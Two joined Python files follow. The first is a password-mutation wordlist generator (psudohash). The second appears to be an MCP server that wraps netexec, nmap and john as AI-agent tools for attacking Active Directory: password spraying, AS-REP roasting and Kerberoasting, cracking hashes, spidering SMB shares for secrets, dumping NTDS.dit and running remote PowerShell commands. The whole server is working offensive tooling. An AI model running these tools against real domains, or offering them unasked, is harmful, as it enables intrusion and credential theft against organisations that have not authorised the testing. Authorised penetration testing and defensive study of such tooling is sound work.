#!/bin/python3
#
# Author: Panagiotis Chartas (t3l3machus)
# https://github.com/t3l3machus
from pathlib import Path

import argparse, sys, itertools
from tqdm import tqdm

# Colors
MAIN = '\033[38;5;50m'
LOGO = '\033[38;5;41m'
LOGO2 = '\033[38;5;42m'
GREEN = '\033[38;5;82m'
ORANGE = '\033[0;38;5;214m'
PRPL = '\033[0;38;5;26m'
PRPL2 = '\033[0;38;5;25m'
RED = '\033[1;31m'
END = '\033[0m'
BOLD = '\033[1m'

# -------------- Arguments & Usage -------------- #
parser = argparse.ArgumentParser(
    formatter_class=argparse.RawTextHelpFormatter,
    epilog='''
Usage examples:

  # 1) No multi-word: treat each keyword separately
      python3 psudohash.py -w foo,bar,baz -cpa
      # → foo, bar, baz

  # 2) In-order joins (-i): up to 2 words by default
      python3 psudohash.py -w foo,bar,baz -i
      # → foo, bar, baz, foobar, foobaz, barbaz

  # 3) All-order combinations (-c): up to 2 words by default
      python3 psudohash.py -w foo,bar,baz -c
      # → foo, bar, baz, foobar, foobaz, barfoo, barbaz, bazfoo, bazbar

  # 4) Change separator between joined words
      python3 psudohash.py -w foo,bar,baz -i --sep "_"
      # → foo, bar, baz, foo_bar, foo_baz, bar_baz, foo_bar_baz

  # 5) Combine up to 3 words (instead of default 2)
      python3 psudohash.py -w foo,bar,baz -i --max-combine 3
      # → foo, bar, baz, foobar, foobaz, barbaz, foobarbaz, ...
'''
    )

parser.add_argument("-w", "--words", action="store", help = "Comma seperated keywords to mutate", required = True)
parser.add_argument("-i", "--inorder", action="store_true", help="Join keywords only in the order given: for each 1≤r≤max_combine, concatenate each r-subset in original sequence.")
parser.add_argument("-c", "--combinations", action="store_true", help="Generate every ordering of every subset (up to max_combine) of the provided keywords.")
parser.add_argument("--max-combine", type=int, default=2, help="Maximum number of raw keywords to join into one base string (default: 2). Applies when using -i or -c.")
parser.add_argument("--minlen", type=int, help="Minimum length (inclusive) of any resulting password. Mutations shorter than this are skipped.")
parser.add_argument("--maxlen", type=int, help="Maximum length (inclusive) of any resulting password. Mutations longer than this are skipped.")
parser.add_argument("--sep", type=str, default="", help="Separator to insert between joined keywords (default: no separator).")
parser.add_argument("-an", "--append-numbering", action="store", help = "Append numbering range at the end of each word mutation (before appending year or common paddings).\nThe LEVEL value represents the minimum number of digits. LEVEL must be >= 1. \nSet to 1 will append range: 1,2,3..100\nSet to 2 will append range: 01,02,03..100 + previous\nSet to 3 will append range: 001,002,003..100 + previous.\n\n", type = int, metavar='LEVEL')
parser.add_argument("-nl", "--numbering-limit", action="store", help = "Change max numbering limit value of option -an. Default is 50. Must be used with -an.", type = int, metavar='LIMIT')
parser.add_argument("-y", "--years", action="store", help = "Singe OR comma seperated OR range of years to be appended to each word mutation (Example: 2022 OR 1990,2017,2022 OR 1990-2000)")
parser.add_argument("-ap", "--append-padding", action="store", help = "Add comma seperated values to common paddings (must be used with -cpb OR -cpa)", metavar='VALUES')
parser.add_argument("-cpb", "--common-paddings-before", action="store_true", help = "Append common paddings before each mutated word") 
parser.add_argument("-cpa", "--common-paddings-after", action="store_true", help = "Append common paddings after each mutated word") 
parser.add_argument("-cpo", "--custom-paddings-only", action="store_true", help = "Use only user provided paddings for word mutations (must be used with -ap AND (-cpb OR -cpa))") 
parser.add_argument("-o", "--output", action="store", help = "Output filename (default: output.txt)", metavar='FILENAME')
parser.add_argument("-q", "--quiet", action="store_true", help = "Do not print the banner on startup")

args = parser.parse_args()

def exit_with_msg(msg):
    parser.print_help()
    print(f'\n[{RED}Debug{END}] {msg}\n')
    sys.exit(1) 



def unique(l):
  
    unique_list = []

    for i in l:
        if i not in unique_list:
            unique_list.append(i)
    
    return unique_list


# Append numbering
if args.numbering_limit and not args.append_numbering:
    exit_with_msg('Option -nl must be used with -an.')

if args.append_numbering:
    if args.append_numbering <= 0:
        exit_with_msg('Numbering level must be > 0.')

_max = args.numbering_limit + 1 if args.numbering_limit and isinstance(args.numbering_limit, int) else 51


# Create years list     
if args.years:
    
    years = []
    
    if args.years.count(',') == 0 and args.years.count('-') == 0 and args.years.isdecimal() and int(args.years) >= 1000 and int(args.years) <= 3200:
        years.append(str(args.years))

    elif args.years.count(',') > 0:
        for year in args.years.split(','):
            if year.strip() != '' and year.isdecimal() and int(year) >= 1000 and int(year) <= 3200: 
                years.append(year)
            else:
                exit_with_msg('Illegal year(s) input. Acceptable years range: 1000 - 3200.')

    elif args.years.count('-') == 1:
        years_range = args.years.split('-')
        start_year = years_range[0]
        end_year = years_range[1]
        
        if (start_year.isdecimal() and int(start_year) < int(end_year) and int(start_year) >= 1000) and (end_year.isdecimal() and int(end_year) <= 3200):
            for y in range(int(years_range[0]), int(years_range[1])+1):
                years.append(str(y))
        else:
            exit_with_msg('Illegal year(s) input. Acceptable years range: 1000 - 3200.')
    else:
        exit_with_msg('Illegal year(s) input. Acceptable years range: 1000 - 3200.')
            

def banner():
    padding = '  '

    P = [[' ', '┌', '─', '┐'], [' ', '├','─','┘'], [' ', '┴',' ',' ']]
    S = [[' ', '┌','─','┐'], [' ', '└','─','┐'], [' ', '└','─','┘']]
    U = [[' ', '┬',' ','┬'], [' ', '│',' ','│'], [' ', '└','─','┘']]
    D = [[' ', '┌','┬','┐'], [' ', ' ','│','│'], [' ', '─','┴','┘']]
    O = [[' ', '┌','─','┐'], [' ', '│',' ','│'], [' ', '└','─','┘']]
    H = [[' ', '┐', ' ', '┌'], [' ', '├','╫','┤'], [' ', '┘',' ','└']]  
    A = [[' ', '┌','─','┐'], [' ', '├','─','┤'], [' ', '┴',' ','┴']]
    S = [[' ', '┌','─','┐'], [' ', '└','─','┐'], [' ', '└','─','┘']]
    H = [[' ', '┬',' ','┬'], [' ', '├','─','┤'], [' ', '┴',' ','┴']]

    banner = [P,S,U,D,O,H,A,S,H]
    final = []
    print('\r')
    init_color = 37
    txt_color = init_color
    cl = 0

    for charset in range(0, 3):
        for pos in range(0, len(banner)):
            for i in range(0, len(banner[pos][charset])):
                clr = f'\033[38;5;{txt_color}m'
                char = f'{clr}{banner[pos][charset][i]}'
                final.append(char)
                cl += 1
                txt_color = txt_color + 36 if cl <= 3 else txt_color

            cl = 0

            txt_color = init_color
        init_color += 31

        if charset < 2: final.append('\n   ')

    print(f"   {''.join(final)}")
    print(f'{END}{padding}                        by t3l3machus\n')


# ----------------( Base Settings )---------------- #
mutations_cage = []
basic_mutations = []
outfile = args.output if args.output else 'output.txt'
trans_keys = []

transformations = [
    {'a' : ['@', '4']},
    {'b' : '8'},
    {'e' : '3'},
    {'g' : ['9', '6']},
    {'i' : ['1', '!']},
    {'o' : '0'},
    {'s' : ['$', '5']},
    {'t' : '7'}
]

for t in transformations:
    for key in t.keys():
        trans_keys.append(key)

# Common Padding Values
if (args.custom_paddings_only or args.append_padding) and not (args.common_paddings_before or args.common_paddings_after):
    exit_with_msg('Options -ap and -cpo must be used with -cpa or -cpb.')
    
    
elif (args.common_paddings_before or args.common_paddings_after) and not args.custom_paddings_only:
    
    try:
        f = open(Path(__file__).parent/'common_padding_values.txt', 'r')
        content = f.readlines()
        common_paddings = [val.strip() for val in content]
        f.close()

    except:
        exit_with_msg('File "common_padding_values.txt" not found.')

elif (args.common_paddings_before or args.common_paddings_after) and (args.custom_paddings_only and args.append_padding):
    common_paddings = []

elif not (args.common_paddings_before or args.common_paddings_after):
    common_paddings = []

else:
    exit_with_msg('\nIllegal padding settings.\n')      

if args.append_padding:
    for val in args.append_padding.split(','):
        if val.strip() != '' and val not in common_paddings: 
            common_paddings.append(val)


if (args.common_paddings_before or args.common_paddings_after):
    common_paddings = list(set(common_paddings))


# ----------------( Functions )---------------- #
# The following list is used to create variations of password values and appended years.
# For example, a passwd value {passwd} will be mutated to "{passwd}{seperator}{year}"
# for each of the symbols included in the list below.
year_seperators = ['', '_', '-', '@']



# ----------------( Functions )---------------- #
def evalTransformations(w):
    
    trans_chars = []
    total = 1
    c = 0   
    w = list(w)
    
    for char in w:
        for t in transformations:
            if char in t.keys():
                trans_chars.append(c)
                if isinstance(t[char], list):
                    total *= 3
                else:
                    total *= 2
        c += 1
            
    return [trans_chars, total]

        

def mutate(tc, word):
    
    global trans_keys, mutations_cage, basic_mutations
    
    i = trans_keys.index(word[tc].lower())
    trans = transformations[i][word[tc].lower()]
    limit = len(trans) * len(mutations_cage)
    c = 0
    
    for m in mutations_cage:
        w = list(m)         

        if isinstance(trans, list):
            for tt in trans:
                w[tc] = tt
                transformed = ''.join(w)
                mutations_cage.append(transformed)
                c += 1
        else:
            w[tc] = trans
            transformed = ''.join(w)
            mutations_cage.append(transformed)
            c += 1
        
        if limit == c: break
        
    return mutations_cage
    


def mutations_handler(kword, trans_chars, total):
    """
    Perform character→symbol/number substitutions and write each new mutation.
    """
    global mutations_cage, basic_mutations

    container = []
    for word in basic_mutations:
        mutations_cage = [word.strip()]
        for tc in trans_chars:
            results = mutate(tc, kword)
        container.append(results)

    for m_set in container:
        for m in m_set:
            basic_mutations.append(m)

    basic_mutations = list(set(basic_mutations))

    desc = " ├─ Mutating word based on commonly used char‐to‐symbol/number substitutions"
    with open(outfile, 'a') as wordlist, \
         tqdm(total=len(basic_mutations), desc=desc, leave=False) as pbar:

        for m in basic_mutations:
            # Only final‐filter if no numbering/years/padding follow
            if not args.append_numbering and not args.years and not (args.common_paddings_after or args.common_paddings_before):
                if not (args.minlen and len(m) < args.minlen) \
                   and not (args.maxlen and len(m) > args.maxlen):
                    wordlist.write(m + '\n')
            else:
                wordlist.write(m + '\n')
            pbar.update(1)

    print(f"{desc}... [100.0%]")


def mutateCase(word):
    trans = list(map(''.join, itertools.product(*zip(word.upper(), word.lower()))))
    return trans



def caseMutationsHandler(word, mutability):
    """
    Generate all upper/lower combos, add to basic_mutations,
    and write to file immediately if mutability is False.
    """
    global basic_mutations
    case_mutations = mutateCase(word)

    desc = " ├─ Producing character case‐based transformations"
    with open(outfile, 'a') as wordlist, \
         tqdm(total=len(case_mutations), desc=desc, leave=False) as pbar:

        for m in case_mutations:
            basic_mutations.append(m)
            if not mutability:
                # Only final‐filter if no substitutions/numbering/years/padding follow
                if not args.combinations and not args.inorder \
                   and not args.append_numbering and not args.years \
                   and not (args.common_paddings_after or args.common_paddings_before):
                    if not (args.minlen and len(m) < args.minlen) \
                       and not (args.maxlen and len(m) > args.maxlen):
                        wordlist.write(m + '\n')
                else:
                    wordlist.write(m + '\n')
            pbar.update(1)

    print(f"{desc}... [100.0%]")


def append_numbering():
    """
    For each word in basic_mutations, append numbering variants (zfilled up to LEVEL).
    """
    global _max, basic_mutations

    lvl = args.append_numbering
    first_cycle = True
    previous_list = []

    # total lines = len(basic_mutations) * lvl * (_max - 1) * 2
    total_lines = len(basic_mutations) * lvl * (_max - 1) * 2
    desc = " ├─ Appending numbering to each word mutation"

    with open(outfile, 'a') as wordlist, \
         tqdm(total=total_lines, desc=desc, leave=False) as pbar:

        for word in basic_mutations:
            for i in range(1, lvl + 1):
                for k in range(1, _max):
                    num_z = str(k).zfill(i)
                    line1 = f"{word}{num_z}\n"
                    line2 = f"{word}_{num_z}\n"

                    if first_cycle:
                        # Only final‐filter if no years or padding follow
                        if not args.years and not (args.common_paddings_after or args.common_paddings_before):
                            if not (args.minlen and len(line1) < args.minlen) \
                               and not (args.maxlen and len(line1) > args.maxlen):
                                wordlist.write(line1)
                                pbar.update(1)
                            else:
                                pbar.update(1)
                            if not (args.minlen and len(line2) < args.minlen) \
                               and not (args.maxlen and len(line2) > args.maxlen):
                                wordlist.write(line2)
                                pbar.update(1)
                            else:
                                pbar.update(1)
                        else:
                            if not args.years and not (args.common_paddings_after or args.common_paddings_before):
                                if not (args.minlen and len(line1) < args.minlen) \
                                   and not (args.maxlen and len(line1) > args.maxlen):
                                    wordlist.write(line1)
                                    pbar.update(1)
                                else:
                                    pbar.update(1)
                                if not (args.minlen and len(line2) < args.minlen) \
                                   and not (args.maxlen and len(line2) > args.maxlen):
                                    wordlist.write(line2)
                                    pbar.update(1)
                                else:
                                    pbar.update(1)
                            else:
                                wordlist.write(line1)
                                wordlist.write(line2)
                                pbar.update(2)
                        previous_list.append(f"{word}{num_z}")
                    else:
                        if previous_list[k - 1] != f"{word}{num_z}":
                            wordlist.write(line1)
                            wordlist.write(line2)
                            previous_list[k - 1] = f"{word}{num_z}"
                            pbar.update(2)

                first_cycle = False

    print(f"{desc}... [100.0%]")    


def mutate_years():
    """
    For each entry in basic_mutations, append year variants (full YYYY + short YY).
    """
    global basic_mutations
    current_mutations = basic_mutations.copy()

    # total lines = len(current_mutations) * len(years) * len(year_seperators) * 2
    total_lines = len(current_mutations) * len(years) * len(year_seperators) * 2
    desc = " ├─ Appending year patterns after each word mutation"

    with open(outfile, 'a') as wordlist, \
         tqdm(total=total_lines, desc=desc, leave=False) as pbar:

        for word in current_mutations:
            for y in years:
                for sep in year_seperators:
                    full = f"{word}{sep}{y}\n"
                    short = f"{word}{sep}{y[2:]}\n"
                    # Only final-filter if no padding follows
                    if not (args.common_paddings_after or args.common_paddings_before):
                        if not (args.minlen and len(full) < args.minlen) \
                           and not (args.maxlen and len(full) > args.maxlen):
                            wordlist.write(full)
                            basic_mutations.append(full.strip())
                        # count one for pbar regardless
                        pbar.update(1)
                        if not (args.minlen and len(short) < args.minlen) \
                           and not (args.maxlen and len(short) > args.maxlen):
                            wordlist.write(short)
                            basic_mutations.append(short.strip())
                        pbar.update(1)
                    else:
                        wordlist.write(full)
                        basic_mutations.append(full.strip())
                        wordlist.write(short)
                        basic_mutations.append(short.strip())
                        pbar.update(2)

    print(f"{desc}... [100.0%]")


def check_underscore(word, pos):
    if word[pos] == '_':
        return True
    else:
        return False
        

def append_paddings_before():
    """
    Prepend each common_paddings value before each word in basic_mutations.
    """
    global basic_mutations
    current_mutations = basic_mutations.copy()

    # total lines = sum(len(common_paddings)*2 for each word)
    total_lines = sum(len(common_paddings) * 2 for _ in current_mutations)
    desc = " ├─ Appending common paddings before each word mutation"

    with open(outfile, 'a') as wordlist, \
         tqdm(total=total_lines, desc=desc, leave=False) as pbar:

        for word in current_mutations:
            for val in common_paddings:
                line1 = f"{val}{word}\n"
                wordlist.write(line1)
                pbar.update(1)

                if not check_underscore(val, -1):
                    line2 = f"{val}_{word}\n"
                    wordlist.write(line2)
                    pbar.update(1)

    print(f"{desc}... [100.0%]")


def append_paddings_after():
    """
    Append each common_paddings value after each word in basic_mutations.
    """
    global basic_mutations
    current_mutations = basic_mutations.copy()

    # total lines = sum(len(common_paddings)*2 for each word)
    total_lines = sum(len(common_paddings) * 2 for _ in current_mutations)
    desc = " ├─ Appending common paddings after each word mutation"

    with open(outfile, 'a') as wordlist, \
         tqdm(total=total_lines, desc=desc, leave=False) as pbar:

        for word in current_mutations:
            for val in common_paddings:
                line1 = f"{word}{val}\n"
                # Only final-filter if no before-padding
                if not args.common_paddings_before:
                    if not (args.minlen and len(line1) < args.minlen) \
                       and not (args.maxlen and len(line1) > args.maxlen):
                        wordlist.write(line1)
                        pbar.update(1)
                    else:
                        pbar.update(1)
                else:
                    wordlist.write(line1)
                    pbar.update(1)

                if not check_underscore(val, 0):
                    line2 = f"{word}_{val}\n"
                    if not args.common_paddings_before:
                        if not (args.minlen and len(line2) < args.minlen) \
                           and not (args.maxlen and len(line2) > args.maxlen):
                            wordlist.write(line2)
                            pbar.update(1)
                        else:
                            pbar.update(1)
                    else:
                        wordlist.write(line2)
                        pbar.update(1)

    print(f"{desc}... [100.0%]")


def calculate_output(keyw):
    
    global trans_keys
    
    c = 0
    total = 1
    basic_total = 1
    basic_size = 0
    size = 0
    numbering_count = 0
    numbering_size = 0
    
    # Basic mutations calc
    for char in keyw:
        if char in trans_keys:
            i = trans_keys.index(keyw[c].lower())
            trans = transformations[i][keyw[c].lower()]
            basic_total *= (len(trans) + 2)     
        else:
            basic_total = basic_total * 2 if char.isalpha() else basic_total
            
        c += 1
    
    total = basic_total 
    basic_size = total * (len(keyw) + 1)
    size = basic_size
    
    # Words numbering mutations calc
    if args.append_numbering:
        global _max
        word_len = len(keyw) + 1
        first_cycle = True
        previous_list = []
        lvl = args.append_numbering
            
        for w in range(0, total):
            for i in range(1, lvl+1):       
                for k in range(1, _max):
                    n = str(k).zfill(i)
                    if first_cycle:                 
                        numbering_count += 2                        
                        numbering_size += (word_len * 2) + (len(n) * 2) + 1
                        previous_list.append(f'{w}{n}')
                        
                    else:
                        if previous_list[k - 1] != f'{w}{n}':
                            numbering_size += (word_len * 2) + (len(n) * 2) + 1
                            numbering_count += 2
                            previous_list[k - 1] = f'{w}{n}'

                first_cycle = False

        del previous_list
        
    # Adding years mutations calc
    if args.years:
        patterns = len(year_seperators) * 2
        year_chars = 4
        year_short = 2
        years_len = len(years)
        size += (basic_size * patterns * years_len)

        for sep in year_seperators:
            size += (basic_total * (year_chars + len(sep)) * years_len)
            size += (basic_total * (year_short  + len(sep)) * years_len)

        total += total * len(years) * patterns
        basic_total = total
        basic_size = size
    
    # Common paddings mutations calc
    patterns = 2
    
    if args.common_paddings_after or args.common_paddings_before:
        paddings_len = len(common_paddings)
        pads_wlen_sum = sum([basic_total*len(w) for w in common_paddings])
        _pads_wlen_sum = sum([basic_total*(len(w)+1) for w in common_paddings])
        
        if args.common_paddings_after and args.common_paddings_before:      
            size += ((basic_size * patterns * paddings_len) + pads_wlen_sum + _pads_wlen_sum) * 2
            total += (total * len(common_paddings) * 2) * 2
        
        elif args.common_paddings_after or args.common_paddings_before:
            size += (basic_size * patterns * paddings_len) + pads_wlen_sum + _pads_wlen_sum
            total += total * len(common_paddings) * 2
    
    return [total + numbering_count, size + numbering_size]



def check_mutability(word):
    
    global trans_keys
    m = 0
    
    for char in word:
        if char in trans_keys:
            m += 1
    
    return m



def chill():
    pass



def main():
    
    banner() if not args.quiet else chill()
    
    global basic_mutations, mutations_cage

    # 1) Read raw keywords (ignore empty or digit-only)
    raw = []
    for w in args.words.split(','):
        w = w.strip()
        if not w:
            continue
        if w.isdecimal():
            exit_with_msg('Unable to mutate digit-only keywords.')
        raw.append(w)

    # 2) Build "base" keywords according to flags:
    #    - If --inorder: join each r-subset in the given order, for r=1..max_combine.
    #    - Elif --combinations: for each r-subset (1..max_combine), generate every permutation.
    #    - Else: treat each raw word on its own.
    from itertools import combinations, permutations

    keywords = []
    limit = min(len(raw), args.max_combine)

    if args.inorder:
        for r in range(1, limit + 1):
            for combo in combinations(raw, r):
                keywords.append(args.sep.join(combo))
    elif args.combinations:
        for r in range(1, limit + 1):
            for combo in combinations(raw, r):
                for perm in permutations(combo):
                    keywords.append(args.sep.join(perm))
    else:
        keywords = list(raw)

    # Calculate total words and size of output
    total_size = [0, 0]
    
    for keyw in keywords:
        count_size = calculate_output(keyw.strip().lower())
        total_size[0] += count_size[0]
        total_size[1] += count_size[1]
    
    size = round(((total_size[1]/1000)/1000), 1) if total_size[1] > 100000 else total_size[1]
    prefix = 'bytes' if total_size[1] <= 100000 else 'MB'
    fsize = f'{size} {prefix}'
    
    print(f'[{MAIN}Info{END}] Calculating output length and size...')

    # Inform user about the output size
    if args.minlen or args.maxlen:
        prompt = (f'[{ORANGE}Warning{END}] Exact final size cannot be determined because min/max-length filtering is active. Without filtering, this would produce {BOLD}{total_size[0]}{END} words, {BOLD}{fsize}{END}. Continue? [y/n]: ')
    else:
        prompt = (f'[{ORANGE}Warning{END}] This operation will produce {BOLD}{total_size[0]}{END} words, {BOLD}{fsize}{END}. Are you sure you want to proceed? [y/n]: ')

    try:
        concent = input(prompt)
    except KeyboardInterrupt:
        exit('\n')
    
    if concent.lower() not in ['y', 'yes']:
        sys.exit(f'\n[{RED}X{END}] Aborting.')
        
    else:
        
        # ensure parent directory exists (works fine if outfile has no directory component)
        out_path = Path(outfile)
        out_path.parent.mkdir(parents=True, exist_ok=True)

        # create or truncate the file
        out_path.open("w", encoding="utf-8").close()

        
        for word in keywords:
            print(f'[{GREEN}*{END}] Mutating keyword: {GREEN}{word}{END} ') 
            mutability = check_mutability(word.lower())
                    
            # Stage 1: Case mutations
            caseMutationsHandler(word.lower(), mutability)
            # Stage 2: Substitution mutations
            if mutability:
                trans = evalTransformations(word.lower())
                mutations_handler(word, trans[0], trans[1])
            else:
                print(f" ├─ {ORANGE}No character substitution instructions match this word.{END}")
            # Stage 3: Numbering
            if args.append_numbering:
                append_numbering()
            # Stage 4: Years
            if args.years:
                mutate_years()
            # Stage 5: Common paddings after
            if args.common_paddings_after or args.custom_paddings_only:
                append_paddings_after()
            # Stage 6: Common paddings before
            if args.common_paddings_before:
                append_paddings_before()            
            basic_mutations = []
            mutations_cage = []
            print(f' └─ Done!')
        
        print(f'\n[{MAIN}Info{END}] Completed! List saved in {outfile}\n')
            

if __name__ == '__main__':
    main()


import asyncio
import json
import logging
from typing import Any, Dict, List, Optional,Union
import aiohttp
from mcp.server.fastmcp import FastMCP
import re
import subprocess
from pathlib import Path
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
import os
from datetime import datetime, date, time, timezone
import csv
import time
import requests
import hmac
import hashlib
import base64
from pentestmcp import config

config.load_variables()

from pentestmcp import bloodhound



def run_command(command: List[str], timeout: int = 150,communicate:bool=False) -> Dict[str, Union[str, int, bool]]:
    try:
        logger.info(f"communicate :{communicate}")
        logger.info(f"Running command: {' '.join(command)}")
        if communicate:
            # Use Popen for interactive communication
            process = subprocess.Popen(
                command,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                stdin=subprocess.PIPE,
                text=True
            )
            stdout, stderr = process.communicate(input="y\n", timeout=timeout)
            returncode = process.returncode
        else:
            # Use run for non-interactive commands
            result = subprocess.run(
                command,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                text=True,
                check=True,
                timeout=timeout
            )
            stdout = result.stdout
            stderr = result.stderr
            returncode = result.returncode

        logger.info(f"Command completed with return code {returncode}")
        return {
            "success": True,
            "stdout": stdout,
            "stderr": stderr,
            "returncode": returncode
        }
        
    except subprocess.CalledProcessError as e:
        logger.error(f"Command failed with return code {e.returncode}: {e.stderr}")
        return {
            "success": False,
            "stdout": e.stdout,
            "stderr": e.stderr,
            "returncode": e.returncode,
            "error": f"Command failed with return code {e.returncode}"
        }
    except subprocess.TimeoutExpired as e:
        logger.error(f"Command timed out after {timeout} seconds")
        return {
            "success": False,
            "error": f"Command timed out after {timeout} seconds"
        }
    except Exception as e:
        logger.error(f"Error running command: {str(e)}")
        return {
            "success": False,
            "error": str(e)
        }



def save_file(directory: str, filename: str, content: str) -> bool:
  
    try:
        if not directory or not filename:
            raise ValueError("Directory and filename cannot be empty")
            
        if not isinstance(content, str):
            raise ValueError("Content must be a string")
        
        dir_path = Path(directory)
        
        dir_path.mkdir(parents=True, exist_ok=True)
        
        file_path = dir_path / filename
        
        with open(file_path, 'w', encoding='utf-8') as file:
            file.write(content)
            
        print(f"File saved successfully: {file_path}")
        return True
        
    except Exception as e:
        print(f"Error saving file: {str(e)}")
        return False




mcp = FastMCP("ACTIVE DIRECTORY MCP")





@mcp.tool(name="save_partial_finding",description="save partial findings for later use (like open ports, used protocols, versions etc.) if finding data is too long or already exists in another file dont save it")
def save_partial_finding(filename: str,content: str):

    

    os.makedirs(config.PROJECT_DIRECTORY, exist_ok=True)


    save_file(config.PROJECT_DIRECTORY, filename, content)

@mcp.tool(name="get_project_directory_files", description="read existing files from the project directory to see what findings and data have been saved")
def get_project_directory_files():
    try:
        project_path = Path(config.PROJECT_DIRECTORY)
        
        if not project_path.exists():
            return f"Project directory does not exist: {project_path}"
        
        if not project_path.is_dir():
            return f"Project path is not a directory: {project_path}"
        
        files_info = []
        for item in project_path.iterdir():
            stat = item.stat()
            file_type = "DIR" if item.is_dir() else "FILE"
            size = stat.st_size
            modified = datetime.fromtimestamp(stat.st_mtime).strftime("%Y-%m-%d %H:%M:%S")
            files_info.append(f"{file_type:<4} {size:>8} {modified} {item.name}")
        
        if not files_info:
            return f"Project directory is empty: {project_path}"
        
        header = f"Contents of {project_path}:\nTYPE     SIZE MODIFIED            NAME\n" + "-"*50
        return header + "\n" + "\n".join(files_info)
        
    except Exception as e:
        return f"Error reading project directory: {str(e)}"

@mcp.tool(name='read_files', description="read a file")
def read_files(path: str | Path) -> str | None:
    try:
        if not path:
            raise ValueError("Path cannot be empty")

        file_path = Path(path).expanduser()

        if not file_path.is_file():
            raise FileNotFoundError(f"File does not exist: {file_path}")

        with file_path.open('r', encoding='utf-8') as file:
            content = file.read()

        print(f"File read successfully: {file_path}")
        return content

    except Exception as e:
        print(f"Error reading file: {e}")
        return None


@mcp.tool(name="check_SMB_signing",description="used to check smb signgings of an ip address or some range of ip addresses with the needed options")
def check_SMB_signing(ips:List[str]):
    return run_command(["netexec","smb"]+ips)


@mcp.tool(name="run_nmap_scan",description="run an nmap scan on an ip or ip range (use the right nmap flags based on the first response)")
async def run_nmap_scan(ips:List[str],flags:List[str]):
    return run_command(["nmap","-sV","-v"]+flags+ips)


@mcp.tool(name="generate_pwd_wordlist",description="generate some password wordlist based on initial input of word(s), let this be the last resort if no other wordlist worked")

def generate_pwd_wordlist(inp:List[str]):
    return run_command([
        "python",
        str(Path(__file__).parent.resolve()/"psudohash/psudohash.py"),
        "-w",
        ",".join(inp),
        "-cpa",
        "-q",
        "-o",
        config.PROJECT_DIRECTORY+"/passwords/"+inp[0].strip()+".txt",
        "--minlen",
        "10",
        "--maxlen",
        "13",
        "--max-combine",
        "2"],
        communicate=True)


@mcp.tool(name="enumerate_domain_users",description="enumerate users on an active directory domain, you can provide username or password if you have some")
def enumerate_domain_users(ips:List[str],username="",password=""):
    if len(username)>0:
        if len(password)>0:
            return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,"--users"])

        return run_command(["netexec","smb"]+ips+["-u",username,"--users"])
    return run_command(["netexec","smb"]+ips+["--users"])


@mcp.tool(name="bruteforce_rid_users",description="Bruteforce rid to enumerate users")
def bruteforce_rid_users(ips:List[str]):
    return run_command(["netexec","smb"]+ips+["--rid-brute"])




@mcp.tool(name="password_spray",description="spray passwords on an account or several accounts")
def password_spray(ips:List[str],usernames:List[str],passwords:List[str],onelogin:bool=False):
    if(onelogin):
        return run_command(["netexec","smb"]+ips+["-u"]+usernames+["-p"]+passwords+["--no-bruteforce","--continue-on-success"])
    return run_command(["netexec","smb"]+ips+["-u"]+usernames+["-p"]+passwords)



@mcp.tool(name="ASREPRoast",description="Retrieve the Kerberos 5 AS-REP etype 23 hash of users without or with Kerberos pre-authentication required ")
def ASREPRoast(ips:List[str],usernames,passwords):
    if len(passwords)>0:
        return run_command(["netexec","ldap"]+ips+["-u",usernames,"-p",passwords,"--asreproast",config.PROJECT_DIRECTORY+"/hashes.txt"])

    return run_command(["netexec","ldap"]+ips+["-u",usernames,"--asreproast",config.PROJECT_DIRECTORY+"/hashes.txt"])

@mcp.tool(name="Kerberoast",description="The goal of Kerberoasting is to harvest TGS tickets for services that run on behalf of user accounts in the AD, not computer accounts. Thus, part of these TGS tickets is encrypted with keys derived from user passwords. As a consequence, their credentials could be cracked offline.")
def kerberoast(ips:List[str],usernames,passwords,output_file:str):
    output_file=config.PROJECT_DIRECTORY+output_file
    if len(passwords)>0:
        return run_command(["netexec","ldap"]+ips+["-u",usernames,"-p",passwords,"--kerberoast",output_file])

    return run_command(["netexec","ldap"]+ips+["-u",usernames,"--kerberoast",output_file])

@mcp.tool(name="get_john_formats",description="check available john format before cracking a hash")
async def get_john_formats():
    
    return run_command(["john","--list=formats"])


@mcp.tool(name="john_the_ripper",description="cracking hashes using john based on format and a wordlist")
async def john_the_ripper(hashfile:str,format:str,wordlist:str="/usr/share/wordlists/rockyou.txt"):
    
    return run_command(["john",f"--format={format}",hashfile,f"--wordlist={wordlist}"])



@mcp.tool(name="spider_smb_shares",description="enumerate smb shares having username and password credentials and dump them into ~/.nxc/modules/nxc_spider_plus/{ip}.json and you'll find the directory inside ~/.nxc/modules/nxc_spider_plus/{ip} that has the data so you could read that. read readable files after you check what files exists and pull valuable information like old versions , hard coded secrets , misconfigurations .. If you see items listed in the share but didn't get downloaded raise the max_size and download again.")
def spider_smb_shares(ips:List[str],username:str,password:str,ntlm:bool=False,kerberos:bool=False,max_size="100000"):
    if(ntlm):
        return run_command(["netexec","smb"]+ips+["-u",username,"-H",password,"-M","spider_plus","-o","DOWNLOAD_FLAG=True",f"MAX_FILE_SIZE={max_size}"])
    elif(kerberos):
        return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,'-k',"-M","spider_plus","-o","DOWNLOAD_FLAG=True",f"MAX_FILE_SIZE={max_size}"])

    return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,"-M","spider_plus","-o","DOWNLOAD_FLAG=True",f"MAX_FILE_SIZE={max_size}"])


@mcp.tool(name="dump_ntds_dit",description="dump NTdS.dit which contains users and their hashes if we have some valid credentials")
def dump_ntds_dit(ips:List[str],username:str,password:str,ntlm:bool=False,kerberos:bool=False):
    if(ntlm):
        return run_command(["netexec","smb"]+ips+["-u",username,"-H",password,"--ntds"],communicate=True)
    elif(kerberos):
        return run_command(["netexec","smb"]+ips+["-u",username,"-p",'-k',password,"--ntds"],communicate=True)

    else:
        return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,"--ntds"],communicate=True)



@mcp.tool(name="command_execution",description="execute powershell commands if we have pwned the user, possible to use ntlm or password for authentication")
def command_execution(ips:List[str],username:str,password:str,command:str,ntlm:bool=False,kerberos:bool=False):
    if (ntlm):
        return run_command(["netexec","smb"]+ips+["-u",username,"-H",password,"-x",command])
    elif(kerberos):
        return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,'-k',"-x",command])

    else:
        return run_command(["netexec","smb"]+ips+["-u",username,"-p",password,"-x",command])


